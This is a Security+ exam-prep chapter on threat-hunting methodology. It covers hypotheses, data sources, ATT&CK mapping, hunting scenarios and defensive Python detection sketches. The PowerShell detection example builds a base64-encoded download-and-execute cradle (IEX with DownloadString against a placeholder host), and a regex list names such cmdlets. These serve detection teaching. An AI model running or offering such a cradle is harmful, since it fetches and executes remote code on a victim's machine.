This chapter covers the threat hunting methodology, a proactive security practice that seeks to identify and mitigate cyber threats before they cause damage. For the SY0-701 exam, threat hunting falls under Domain 4.0 (Security Operations), Objective 4.8: Explain appropriate incident response activities, which lists threat hunting by name. Understanding this methodology is critical because it shifts the security posture from reactive to proactive, reducing dwell time and attack impact. This chapter will equip you with the structured process, tools, and mindset required to conduct effective threat hunts.
Threat hunting is like a detective proactively investigating a neighborhood for signs of burglars, rather than waiting for a crime to be reported. A traditional detective (IDS/SIEM) responds to alarms—someone calls 911, and they show up to investigate. But a proactive detective (threat hunter) doesn't wait for the alarm. They walk the streets looking for unusual patterns: a ladder left against a house, a broken window, footprints in the mud, or a car circling the block multiple times. They use hypotheses: 'If a burglar is casing the area, I'd expect to see...' Then they check surveillance footage (logs), interview neighbors (endpoints), and look for tools like crowbars (malware). The key is they don't have a specific alert—they're looking for indicators of compromise (IoCs) that don't match the baseline. In cybersecurity, this means analyzing network traffic, endpoint telemetry, and logs for anomalies that bypass existing detection rules. The hunter uses the same tools as the detective: a notepad (SIEM queries), a flashlight (packet capture), and a keen eye for detail (threat intelligence). Just as a detective might find a burglary in progress before the alarm sounds, a threat hunter can discover an attacker's foothold before they exfiltrate data.
What is Threat Hunting?
Threat hunting is the proactive and iterative process of searching through network, endpoint, and log data to detect and isolate advanced threats that evade existing security controls. Unlike automated detection systems (e.g., SIEM rules, antivirus) that rely on known signatures or predefined anomalies, threat hunting assumes that a breach has already occurred or is in progress. The goal is to reduce the mean time to detect (MTTD) and mean time to respond (MTTR) by identifying suspicious activity that doesn't trigger alerts.
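As a rough illustration of the MTTD metric mentioned above, the sketch below averages the gap between compromise and detection over a few made-up incidents. The timestamps and the `mean_time_to_detect` name are hypothetical, and the sketch assumes each record already carries a reliable time of initial compromise, which in practice is often only an estimate.

```python
from datetime import datetime, timedelta

# Hypothetical incident records: (initial compromise, detection). Illustrative only.
INCIDENTS = [
    (datetime(2024, 1, 1, 8, 0), datetime(2024, 1, 3, 8, 0)),      # 48 hours
    (datetime(2024, 2, 10, 12, 0), datetime(2024, 2, 11, 12, 0)),  # 24 hours
    (datetime(2024, 3, 5, 0, 0), datetime(2024, 3, 9, 0, 0)),      # 96 hours
]


def mean_time_to_detect(incidents):
    """Average gap between compromise and detection across incidents."""
    if not incidents:
        raise ValueError("need at least one incident")
    gaps = (detected - compromised for compromised, detected in incidents)
    return sum(gaps, timedelta()) / len(incidents)


mttd = mean_time_to_detect(INCIDENTS)
print(f"MTTD: {mttd.total_seconds() / 3600:.1f} hours")
```

A hunt that surfaces an intrusion earlier shortens the individual gaps, which is what pulls the average down.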
The Threat Hunting Loop
The methodology follows a structured loop: (1) Formulate a hypothesis based on threat intelligence or observed anomalies, (2) Collect and analyze data from various sources (e.g., firewalls, endpoints, DNS logs), (3) Investigate findings to confirm or refute the hypothesis, (4) Respond and remediate if a threat is found, and (5) Feed insights back to improve detection rules and future hunts. This loop is continuous and iterative.
Hypothesis-Driven vs. Data-Driven Hunting
There are two primary approaches: hypothesis-driven and data-driven. Hypothesis-driven hunting starts with a question like 'Is there evidence of lateral movement using PsExec?' based on a new vulnerability or TTP (Tactics, Techniques, and Procedures). Data-driven hunting examines a dataset (e.g., all outbound connections to new IPs) and looks for outliers without a predefined hypothesis. Both are valid, but hypothesis-driven is more structured and efficient for targeted threats.
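The data-driven example above (outbound connections to new IPs) can be sketched as a simple set comparison against a baseline. The `new_destinations` function and the sample flows are hypothetical; the addresses come from documentation-only ranges, and a real hunt would pull both datasets from NetFlow or firewall logs.

```python
from collections import Counter


def new_destinations(baseline, current):
    """Return destinations seen in `current` but never in `baseline`, with hit counts."""
    known = {dst for _src, dst in baseline}
    counts = Counter(dst for _src, dst in current if dst not in known)
    return counts.most_common()


# Hypothetical (source, destination) pairs standing in for flow records.
BASELINE = [
    ("10.0.0.5", "198.51.100.10"),
    ("10.0.0.6", "198.51.100.10"),
    ("10.0.0.5", "198.51.100.20"),
]
CURRENT = [
    ("10.0.0.5", "198.51.100.10"),
    ("10.0.0.7", "203.0.113.50"),
    ("10.0.0.7", "203.0.113.50"),
    ("10.0.0.6", "192.0.2.99"),
]

outliers = new_destinations(BASELINE, CURRENT)
for dst, hits in outliers:
    print(dst, hits)
```

New destinations are only leads, not verdicts; most will turn out to be benign services that simply were not in the baseline window.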
Key Data Sources for Hunting
Network logs: Firewall logs, proxy logs, DNS logs, NetFlow/IPFIX. DNS logs are particularly valuable because many malware families generate DNS queries for C2 (command and control) domains.
Endpoint logs: Windows Event Logs (Security, System, PowerShell), Sysmon logs, EDR (Endpoint Detection and Response) telemetry. Sysmon, with Event IDs like 1 (process creation), 3 (network connection), and 11 (file creation), is a favorite among hunters.
Cloud logs: AWS CloudTrail, Azure Monitor, GCP Audit Logs. These help detect lateral movement in cloud environments.
Threat intelligence feeds: Known malicious IPs, domains, hashes, and TTPs from sources like MITRE ATT&CK, VirusTotal, and ISACs.
The Role of MITRE ATT&CK Framework
MITRE ATT&CK is a globally accessible knowledge base of adversary TTPs. Threat hunters use it to structure hypotheses. For example, a hunter might focus on the 'Lateral Movement' tactic and search for use of 'Remote Services' technique T1021.006 (Windows Remote Management). By mapping findings to ATT&CK, hunters can assess the stage of an attack and prioritize response.
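One way to picture the mapping step is a lookup from technique ID to tactic, then grouping findings by tactic. The sketch below uses a small hand-copied subset of ATT&CK IDs rather than the full knowledge base, and the host names, `FINDINGS` list, and `group_by_tactic` helper are hypothetical.

```python
from collections import defaultdict

# Small hand-copied subset of ATT&CK technique IDs, not a full catalogue.
TECHNIQUES = {
    "T1021.001": ("Lateral Movement", "Remote Services: Remote Desktop Protocol"),
    "T1021.006": ("Lateral Movement", "Remote Services: Windows Remote Management"),
    "T1059.001": ("Execution", "Command and Scripting Interpreter: PowerShell"),
    "T1572": ("Command and Control", "Protocol Tunneling"),
}


def group_by_tactic(findings):
    """Group (host, technique_id) findings under their ATT&CK tactic."""
    grouped = defaultdict(list)
    for host, technique_id in findings:
        tactic, name = TECHNIQUES.get(technique_id, ("Unmapped", "Unknown technique"))
        grouped[tactic].append((host, technique_id, name))
    return dict(grouped)


# Hypothetical hunt findings.
FINDINGS = [
    ("ws-014", "T1059.001"),
    ("srv-fin-02", "T1021.006"),
    ("ws-014", "T1572"),
    ("srv-fin-03", "T1021.001"),
]

grouped = group_by_tactic(FINDINGS)
for tactic, items in grouped.items():
    print(tactic, items)
```

Seeing several tactics on the same host (here execution plus command and control on `ws-014`) is a hint about how far along the attack may be.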
Tools of the Trade
SIEM (Security Information and Event Management): Splunk, ELK Stack, Microsoft Sentinel. Used for querying large datasets and creating dashboards.
EDR (Endpoint Detection and Response): CrowdStrike, Microsoft Defender for Endpoint, SentinelOne. Provides granular endpoint telemetry.
Network Traffic Analysis: Wireshark, Zeek, RITA (Real Intelligence Threat Analytics). For analyzing packet captures and flow data.
Threat Intelligence Platforms (TIP): MISP, ThreatConnect. To integrate external intelligence.
Adversary Emulation Tools: Atomic Red Team, Caldera. To simulate attacks and validate detection.
Hypothesis Formulation Example
Hypothesis: 'An attacker may be using PowerShell to download and execute payloads in our environment.' To test this, a hunter would:
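1. Query PowerShell logging events (Event ID 4104 for script block logging, 4103 for module logging) over the last 30 days, along with process creation events for powershell.exe (Event ID 4688 or Sysmon Event ID 1).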
2. Look for base64-encoded commands, download patterns (e.g., Invoke-WebRequest), or execution of encoded scripts.
3. Cross-reference with network logs for outbound connections to uncommon IPs during those PowerShell sessions.
4. If suspicious activity is found, escalate to incident response.
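Step 2 of the list above could be approximated with a few regular expressions plus decoding of any `-EncodedCommand` argument (base64 over UTF-16LE text). This is a minimal sketch, not a production detection: the pattern names, the `score_script_block` helper, and the sample command line are all hypothetical, and real attackers obfuscate well beyond what these patterns catch.

```python
import base64
import re

# Hypothetical pattern set; tune for your own environment.
SUSPICIOUS = {
    "download_cmdlet": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE), if one is present."""
    match = ENCODED_ARG.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Return sorted names of suspicious traits found in a command line or script."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else f"{text}\n{decoded}"
    hits = [name for name, pattern in SUSPICIOUS.items() if pattern.search(haystack)]
    if decoded is not None:
        hits.append("encoded_command")
    return sorted(hits)


# Build a sample the way an encoded launcher would look (illustrative URL).
payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a.ps1')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
sample = f"powershell.exe -NoProfile -EncodedCommand {encoded}"

print(score_script_block(sample))
print(score_script_block("Get-ChildItem C:\\Temp"))
```

Hits from a scan like this still need the cross-referencing in step 3 before they justify escalation, since administrators also use these cmdlets legitimately.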
Indicators of Compromise (IoC) vs. Indicators of Attack (IoA)
IoC: Forensic evidence of a past compromise (e.g., a file hash, IP address, registry key). It's reactive.
IoA: Signs that an attack is in progress (e.g., unusual lateral movement, privilege escalation attempts). Threat hunting focuses on IoAs because they indicate active threats.
The Pyramid of Pain
This model illustrates how different types of IoCs impact attackers. At the base: hash values (easy to change). Above: IP addresses, domain names, network artifacts, host artifacts, tools, and at the top: TTPs (hardest to change). Threat hunters aim to identify TTPs because forcing attackers to change their behavior is the most disruptive.
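The ordering in the pyramid can be expressed as a ranked enumeration, which makes it easy to sort a mixed bag of indicators so the ones that cost the attacker most come first. The sketch groups network and host artifacts into one level, and the `Pain` enum, `prioritize` helper, and sample indicators are hypothetical.

```python
from enum import IntEnum


class Pain(IntEnum):
    """Pyramid of Pain levels, from easiest (1) to hardest (6) for an attacker to change."""
    HASH = 1
    IP_ADDRESS = 2
    DOMAIN_NAME = 3
    NETWORK_OR_HOST_ARTIFACT = 4
    TOOL = 5
    TTP = 6


def prioritize(indicators):
    """Sort (description, level) pairs so the costliest-to-change come first."""
    return sorted(indicators, key=lambda item: item[1], reverse=True)


# Hypothetical indicators collected during a hunt.
INDICATORS = [
    ("SHA-256 of dropped binary", Pain.HASH),
    ("PowerShell download cradle followed by in-memory execution", Pain.TTP),
    ("malicious-c2.example.com", Pain.DOMAIN_NAME),
    ("203.0.113.50", Pain.IP_ADDRESS),
]

ranked = prioritize(INDICATORS)
for description, level in ranked:
    print(level.name, "-", description)
```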
Common Hunting Scenarios
Lateral Movement Detection: Look for anomalous RDP, SMB, or WinRM connections between workstations and servers. Use logs like Windows Event ID 4624 (logon) and 4648 (explicit credentials).
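C2 Beaconing: Analyze network flows for periodic outbound connections to suspicious IPs. Beacons may use non-standard ports or hide on common ones such as TCP 443; what gives them away is unusually regular timing, often with slight jitter, rather than the port itself.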
Data Exfiltration: Monitor large outbound transfers, especially to cloud storage or new domains. Use NetFlow and proxy logs.
Living off the Land (LotL): Hunt for misuse of built-in tools like PowerShell, WMI, BITSAdmin, and Certutil. These are often used by attackers to blend in.
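For the beaconing scenario in the list above, one simple heuristic is to measure how regular the gaps between connections are. The sketch below uses the coefficient of variation (standard deviation divided by mean) of inter-connection intervals; the `beacon_score` name, the sample timestamps, and any cut-off you apply to the score are assumptions, and dedicated tools use richer scoring than this.

```python
from statistics import mean, pstdev


def beacon_score(timestamps):
    """Coefficient of variation of gaps between connections; lower means more regular."""
    if len(timestamps) < 3:
        return None  # too few connections to judge regularity
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    average = mean(gaps)
    if average == 0:
        return None
    return pstdev(gaps) / average


# Hypothetical connection times in seconds for one source/destination pair.
BEACON_LIKE = [0, 60, 121, 180, 241, 300]   # roughly every 60 s with slight jitter
HUMAN_LIKE = [0, 5, 200, 210, 900, 905]     # bursty, irregular browsing

print(f"beacon-like: {beacon_score(BEACON_LIKE):.3f}")
print(f"human-like:  {beacon_score(HUMAN_LIKE):.3f}")
```

A low score only says the timing is machine-like; software updaters and monitoring agents also beacon, so the destination still needs to be vetted.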
Validation and Escalation
When a hunter finds suspicious activity, they must validate it: check false positives, correlate with other data, and determine severity. If confirmed, they escalate to the incident response team (CSIRT) with a detailed report including timestamps, affected systems, IoCs, and recommended containment steps. The hunter also feeds observations back to improve detection rules (e.g., adding a new SIEM correlation rule).
Challenges in Threat Hunting
Data Overload: Too much log data can obscure real threats. Prioritize high-value sources like DNS and authentication logs.
Skill Gap: Requires deep knowledge of normal behavior, attack techniques, and tool proficiency.
False Positives: Overly broad hypotheses can yield many false leads. Iterate and refine.
Budget: Advanced tools like EDR and SIEM can be expensive; smaller orgs may rely on open-source tools like Zeek and ELK.
Maturity Models
Organizations mature in hunting capabilities. The Hunting Maturity Model (HMM), sometimes called the Threat Hunting Maturity Model, has five levels: Level 0 (Initial) – relies primarily on automated alerts; Level 1 (Minimal) – incorporates threat intelligence indicator searches; Level 2 (Procedural) – follows hunting procedures created by others; Level 3 (Innovative) – creates new hunting procedures; Level 4 (Leading) – automates the majority of successful hunting procedures. SY0-701 expects candidates to understand that hunting is a mature security practice beyond basic alert monitoring.
Real-World Example: SolarWinds Breach
In the SolarWinds attack (2020), threat hunters who proactively searched for unusual DNS activity might have detected the Sunburst backdoor earlier. The malware's initial C2 signaling relied on DNS queries to algorithmically generated subdomains of avsvmcloud[.]com that encoded information about the victim. A hunter focusing on DNS anomalies, such as long, high-entropy subdomains under a rarely seen parent domain, might have uncovered the breach before the public disclosure in December 2020.
Summary of Key Steps
Hypothesize: Based on threat intel or anomalies.
Collect: Gather relevant data from logs, endpoints, network.
Analyze: Use tools to find patterns and outliers.
Validate: Confirm findings and rule out false positives.
Respond: Escalate to incident response.
Improve: Update detection rules and share intelligence.
Formulate a Hypothesis
The first step is to create a testable hypothesis based on threat intelligence, recent vulnerabilities, or observed anomalies. For example, 'I suspect that an attacker is using DNS tunneling for C2 communication because we noticed unusual DNS query patterns from a few internal hosts.' The hypothesis should be specific and actionable. It often references MITRE ATT&CK techniques (e.g., T1572: Protocol Tunneling). During this step, the hunter defines the scope (timeframe, systems, data sources) and success criteria (what would confirm the hypothesis). A common mistake is making the hypothesis too broad, like 'Is there malware?' which leads to unfocused analysis.
Collect Relevant Data
Based on the hypothesis, the hunter identifies and gathers data from appropriate sources. For DNS tunneling, this includes DNS query logs from the DNS server or proxy logs, network flow data (NetFlow/IPFIX) to see traffic patterns, and possibly endpoint logs for processes that generate DNS queries. Tools like Splunk or ELK can query large datasets. The hunter ensures data covers the relevant timeframe (e.g., last 7 days) and includes necessary fields (source IP, query name, response code, etc.). Data collection must be efficient to avoid overwhelming storage or bandwidth. A common pitfall is collecting too much irrelevant data, which slows analysis.
Analyze Data for Anomalies
The hunter uses analytical techniques to find deviations from the baseline. For DNS tunneling, this might involve looking for: (1) high volume of DNS queries to a single domain, (2) queries with long subdomains (e.g., 'base64encodeddata.malicious.com'), (3) queries with high entropy in the domain name, (4) queries to domains that rarely resolve, or (5) queries sent directly to external resolvers by hosts that should be using the internal DNS servers. Tools like RITA (Real Intelligence Threat Analytics) can automatically score domains based on suspicious characteristics. The hunter visualizes data using histograms or time series to spot spikes. This step requires understanding of normal traffic patterns; otherwise, benign traffic (e.g., CDN domains) could be mistaken for malicious.
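Checks (2) and (3) above can be sketched with a Shannon entropy calculation over the leftmost label of each query name. The thresholds (`max_label_len=40`, `min_entropy=3.5`), the `flag_query` helper, and the sample names are assumptions chosen for illustration; sensible values depend on what is normal in your own DNS traffic.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy in bits per character; 0.0 for an empty string."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in Counter(text).values())


def flag_query(qname, max_label_len=40, min_entropy=3.5):
    """Return reasons the leftmost label of a DNS query name looks suspicious."""
    label = qname.rstrip(".").split(".")[0]
    reasons = []
    if len(label) > max_label_len:
        reasons.append("long_label")
    if shannon_entropy(label) >= min_entropy:
        reasons.append("high_entropy")
    return reasons


# Hypothetical query names; the long label is made-up encoded-looking data.
SUSPECT = "dGhpcyBpcyBhIHRlc3Qgb2YgZG5zIHR1bm5lbGluZyBkYXRh.malicious-c2.example.com"
BENIGN = "www.example.com"

print(flag_query(SUSPECT))
print(flag_query(BENIGN))
```

CDN and telemetry hostnames can also trip both checks, which is why the baseline knowledge mentioned above matters before treating a flag as a finding.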
Validate Findings
Once potential anomalies are identified, the hunter validates them to confirm they are true threats, not false positives. Validation involves cross-referencing with other data sources: check endpoint logs for the process that made the DNS queries, verify if the domain is associated with known malware via threat intelligence feeds (e.g., VirusTotal), and check for other signs of compromise (e.g., unusual processes, registry changes). For DNS tunneling, the hunter might run a packet capture on the suspected host to inspect DNS payloads. If the finding is confirmed, the hunter documents evidence: timestamps, IPs, domains, hashes, and screenshots. If it's a false positive, the hunter notes the cause (e.g., legitimate application using long subdomains) and refines the hypothesis.
Escalate and Remediate
Validated threats are escalated to the incident response team (CSIRT) with a detailed report. The report includes: the hypothesis, data sources used, findings, affected systems, IoCs (domains, IPs, file hashes), and recommended containment actions (e.g., block the C2 domain at the firewall, isolate the host). The hunter may also perform immediate containment if authorized, such as adding a firewall rule to block the malicious IP. After remediation, the hunter ensures the threat is fully removed and monitors for recurrence. A common mistake is failing to provide actionable IoCs, which delays response.
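The report contents listed above lend themselves to a small structured record, which also makes it easy to catch missing pieces before handing off to the response team. The `HuntReport` class, its field names, and the sample values are hypothetical; an organization's ticketing system will usually dictate the real schema.

```python
import json
from dataclasses import asdict, dataclass, field


@dataclass
class HuntReport:
    """Minimal escalation record mirroring the report contents described above."""
    hypothesis: str
    data_sources: list
    findings: str
    affected_systems: list
    iocs: dict = field(default_factory=dict)
    containment: list = field(default_factory=list)

    def missing_fields(self):
        """Names of fields left empty, so gaps are caught before escalation."""
        return [name for name, value in asdict(self).items() if not value]


# Hypothetical report with the containment recommendations not yet filled in.
report = HuntReport(
    hypothesis="DNS tunneling is being used for C2 (T1572)",
    data_sources=["DNS query logs", "EDR telemetry"],
    findings="Workstation ws-014 sent thousands of long-subdomain queries to one domain.",
    affected_systems=["ws-014"],
    iocs={"domains": ["malicious-c2.example.com"]},
)

print("Missing:", report.missing_fields())
print(json.dumps(asdict(report), indent=2))
```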
Improve Detection and Share Intel
The final step is to feed lessons learned back into the security program. The hunter updates SIEM correlation rules to detect similar activity automatically (e.g., create a rule for high-entropy DNS queries). They also share IoCs and TTPs with threat intelligence platforms (e.g., MISP) and internal teams. This step closes the loop: the next hunt becomes more efficient because the detection engine now covers the previously missed threat. Additionally, the hunter documents the methodology and results in a hunt report to improve future hypotheses. Without this step, the organization remains vulnerable to the same technique.
Scenario 1: DNS Tunneling in a Financial Firm
A threat hunter at a bank notices an alert from the SIEM about a high volume of DNS queries from a single workstation to a domain with long subdomains. The SIEM rule flags it as 'Possible DNS Tunneling.' The hunter begins by querying DNS logs for that workstation over the past 24 hours. They find thousands of queries to 'malicious-c2.example.com' with subdomains containing base64-encoded data. Using RITA, they confirm the domain has a high 'suspicious score' due to entropy and query frequency. The hunter then checks endpoint logs via EDR and sees a process 'svchost.exe' running from a non-standard path ('C:\Users\Public\svchost.exe') making these DNS queries. They isolate the host and escalate to incident response. The response team blocks the domain at the firewall, removes the malware, and conducts a broader hunt for similar activity. The hunter then writes a new SIEM rule to detect base64-encoded subdomains and shares the IoCs (domain, hash of the malware) with the financial sector ISAC. A common mistake in this scenario would be to dismiss the alert as a false positive because DNS traffic on port 53 is routine and almost always allowed outbound; DNS tunneling abuses exactly that trust to blend in.
Scenario 2: Lateral Movement via RDP in a Hospital
A hunter in a hospital network hypothesizes that an attacker may have moved laterally using RDP after an initial phishing compromise. They collect Windows Security Event Logs (Event ID 4624) for remote logons over RDP (Logon Type 10) from internal workstations to servers. They find a pattern: a single workstation in radiology has made RDP connections to three different servers in the finance department, which is unusual because radiology staff do not need access to finance servers. The hunter also sees Event ID 4648 (explicit credentials) indicating the use of different accounts. They validate by checking EDR logs for process creation on the target servers; they find 'taskkill.exe' and 'net.exe' used to stop security services. The hunter confirms a compromise and escalates. The incident response team resets the compromised accounts, isolates the radiology workstation, and scans for persistence. The hunter then creates a detection rule for anomalous RDP connections between departments. A common mistake is to assume RDP is always legitimate because it's a common administrative tool, but cross-department RDP from a low-privilege workstation is a red flag.
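The cross-department check in this scenario can be sketched as a filter over parsed logon events joined against an asset inventory. Everything named here is hypothetical: the `DEPARTMENT` inventory, the simplified event dictionaries (real 4624 events carry the source as workstation name and IP fields that need normalizing first), and the `cross_department_rdp` helper.

```python
# Hypothetical host-to-department inventory.
DEPARTMENT = {
    "rad-ws-07": "radiology",
    "rad-srv-01": "radiology",
    "fin-srv-01": "finance",
    "fin-srv-02": "finance",
}

# Simplified, already-parsed logon events (illustrative values only).
EVENTS = [
    {"event_id": 4624, "logon_type": 10, "source_host": "rad-ws-07",
     "target_host": "fin-srv-01", "account": "svc_backup"},
    {"event_id": 4624, "logon_type": 10, "source_host": "rad-ws-07",
     "target_host": "rad-srv-01", "account": "jdoe"},
    {"event_id": 4624, "logon_type": 3, "source_host": "rad-ws-07",
     "target_host": "fin-srv-02", "account": "jdoe"},
    {"event_id": 4624, "logon_type": 10, "source_host": "rad-ws-07",
     "target_host": "fin-srv-02", "account": "admin_fin"},
]


def cross_department_rdp(events, department):
    """Return (source, target, account) for RDP logons that cross departments."""
    hits = []
    for event in events:
        # Event ID 4624 with Logon Type 10 is a remote interactive (RDP) logon.
        if event["event_id"] != 4624 or event["logon_type"] != 10:
            continue
        src = department.get(event["source_host"])
        dst = department.get(event["target_host"])
        # Hosts missing from the inventory are skipped in this sketch.
        if src and dst and src != dst:
            hits.append((event["source_host"], event["target_host"], event["account"]))
    return hits


hits = cross_department_rdp(EVENTS, DEPARTMENT)
for hit in hits:
    print(hit)
```

Skipping unknown hosts keeps the sketch short, but in a real hunt hosts absent from the inventory deserve their own review.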
Scenario 3: Living off the Land in a Tech Company
A hunter in a SaaS company focuses on PowerShell abuse. They query Event ID 4104 (PowerShell script block logging) for scripts that use 'Invoke-WebRequest' or 'DownloadString.' They find a script that downloads a payload from a pastebin URL and executes it in memory. The script is base64-encoded and uses 'IEX' (Invoke-Expression). The hunter checks the endpoint's network logs and sees an outbound connection to the pastebin IP. They validate by checking the file hash of the downloaded payload on VirusTotal, which identifies it as a known backdoor. The hunter isolates the host and escalates. The response team removes the malware and checks for lateral movement. The hunter then adds a SIEM rule to flag any PowerShell script containing 'IEX' combined with 'DownloadString.' A common mistake is to overlook PowerShell logs because they are verbose, but script block logging (enabled via GPO) is critical for detecting fileless attacks.
What SY0-701 Tests on Threat Hunting
Objective 4.8 (Explain appropriate incident response activities) lists threat hunting, so you should be able to explain what it is and why it matters. The exam focuses on:
The purpose: proactive detection of threats that evade automated tools.
The methodology: hypothesis-driven, iterative process.
Key concepts: IoC vs. IoA, Pyramid of Pain, dwell time, MTTD, MTTR.
Relationship to other security functions: hunting feeds into incident response and detection engineering.
Common Wrong Answers and Why Candidates Choose Them
1. 'Threat hunting is the same as penetration testing.' Candidates confuse proactive security with offensive testing. Pen testing is authorized exploitation to find vulnerabilities; threat hunting is searching for active threats. The exam distinguishes them: pen tests are periodic, hunting is continuous.
2. 'Threat hunting replaces the need for a SIEM.' Candidates think hunting is a substitute for automated detection. In reality, hunting complements the SIEM by finding what it misses.
3. 'Hunting only uses IoCs.' Many candidates focus on IoCs (hashes, IPs) because they are concrete. But the exam emphasizes hunting for IoAs and TTPs, which are more sophisticated.
4. 'Hunting is a one-time activity.' The iterative nature of hunting is often misunderstood. The exam expects you to know that hunting is a continuous process.
Specific Terms and Acronyms
Dwell time: The length of time an attacker is present in the environment before detection.
Hypothesis: A testable statement about potential adversary activity.
Pyramid of Pain: Model showing difficulty of changing IoCs; TTPs are at the top.
IoA (Indicator of Attack): Signs of ongoing attack (e.g., lateral movement).
TTPs (Tactics, Techniques, and Procedures): Adversary behavior patterns.
MITRE ATT&CK: Framework for categorizing TTPs.
Common Trick Questions
A question might describe a scenario where an analyst reviews logs after an alert. That is incident response, not hunting; hunting is proactive and happens before an alert.
Another trick: 'Which of the following is the first step in threat hunting?' The answer is 'Formulate a hypothesis,' not 'Collect data' or 'Analyze logs.'
Decision Rule for Eliminating Wrong Answers
On scenario questions, ask: 'Is the action being taken before an alert or after?' If after, it's incident response, not hunting. Also, if the action involves testing for vulnerabilities (like running a vulnerability scanner), it's a vulnerability assessment or pen test. Hunting specifically looks for signs of compromise, not vulnerabilities.
Threat hunting is a proactive process that assumes a breach has already occurred.
The first step in a hypothesis-driven hunt, the form the exam emphasizes, is to formulate a hypothesis.
MITRE ATT&CK is the primary framework used to structure hypotheses and categorize TTPs.
Dwell time is the period an attacker remains undetected; hunting aims to reduce it.
The Pyramid of Pain illustrates that targeting TTPs is most disruptive to attackers.
Common hunting scenarios include DNS tunneling, lateral movement, and living off the land.
Hunting feeds into incident response and detection engineering to improve overall security.
Tools like Sysmon, Zeek, and RITA are commonly used for hunting.
These come up on the exam all the time. Here's how to tell them apart.
Threat Hunting
Proactive: seeks threats before alerts trigger
Hypothesis-driven or data-driven
Goal: reduce dwell time and MTTD
Output: suspicious activity report, IoCs
Performed by threat hunters or analysts
Incident Response
Reactive: responds to confirmed incidents
Alert-driven or report-driven
Goal: contain, eradicate, recover
Output: incident report, remediation steps
Performed by CSIRT or incident responders
Indicator of Compromise (IoC)
Evidence of past compromise (e.g., file hash, IP)
Reactive: used after a breach is discovered
Easy for attackers to change (e.g., new hash)
Often shared in threat intel feeds
Detectable by signature-based tools
Indicator of Attack (IoA)
Signs of ongoing attack (e.g., lateral movement)
Proactive: used to detect attacks in progress
Harder for attackers to change (TTPs)
Requires behavioral analysis
Detectable by anomaly-based tools and hunting
Mistake
Threat hunting is only for large enterprises with advanced tools.
Correct
Threat hunting can be performed by organizations of any size using free tools like Zeek, ELK, and Sysmon. The methodology scales; even small teams can hunt by focusing on high-value data sources like DNS logs.
Mistake
Threat hunting is the same as incident response.
Correct
Incident response reacts to a confirmed incident; threat hunting proactively searches for signs of compromise before an alert is triggered. Hunting may lead to incident response, but they are distinct processes.
Mistake
Threat hunting only uses automated tools and doesn't require human intuition.
Correct
While tools assist, hunting relies heavily on human creativity and intuition to formulate hypotheses and recognize subtle anomalies that automated rules miss.
Mistake
If a SIEM has no alerts, there is no need to hunt.
Correct
A lack of alerts does not mean the environment is clean; attackers may have evaded detection. Hunting is necessary to uncover stealthy threats that SIEM rules don't catch.
Mistake
Threat hunting always starts with a hypothesis.
Correct
While hypothesis-driven hunting is common, data-driven hunting (also called 'hunting without a hypothesis') starts by analyzing data for outliers. Both are valid approaches.
Threat hunting searches for active threats or signs of compromise, while vulnerability scanning identifies potential weaknesses (e.g., missing patches) that could be exploited. Hunting looks for IoCs and IoAs; scanning looks for CVEs. For the exam, remember that hunting is proactive and assumes a breach, whereas scanning is a preventive measure.
The first step is to formulate a hypothesis. This is a testable statement about potential adversary activity, such as 'An attacker may be using PowerShell to download payloads.' Without a hypothesis, the hunt lacks direction. The exam tests this order: hypothesis first, then data collection, analysis, validation, response, and improvement.
Dwell time is the duration an attacker remains undetected. Threat hunting actively searches for signs of compromise, often catching attackers earlier than automated alerts. By discovering threats during the reconnaissance or lateral movement phase (rather than after exfiltration), hunting shortens dwell time and limits damage.
The Pyramid of Pain is a model that shows how different types of IoCs impact attackers. At the base are hash values (easy to change), then IPs, domains, network artifacts, host artifacts, tools, and at the top are TTPs (hardest to change). Hunters aim to identify TTPs because forcing attackers to change their behavior is most disruptive.
Some aspects can be automated, like data collection and initial analysis (e.g., running queries for known IoCs). However, the core of hunting—hypothesis formulation, anomaly recognition, and validation—requires human intuition and expertise. The exam emphasizes that hunting is a human-driven process augmented by tools.
Threat intelligence provides context about adversary TTPs, IoCs, and emerging threats. Hunters use this intel to formulate hypotheses (e.g., 'Is there evidence of the new APT group's TTPs?') and to validate findings. Without intel, hunts may miss relevant patterns. The exam expects you to know that intel feeds into the hypothesis step.
The Cyber Kill Chain describes stages of an attack (reconnaissance, weaponization, delivery, exploitation, installation, C2, actions on objectives). Threat hunting can detect adversaries at any stage, but it's especially valuable when it catches activity before the final stage, for example at installation or C2, before data exfiltration. Hunters use the kill chain to understand where in the attack lifecycle a finding falls.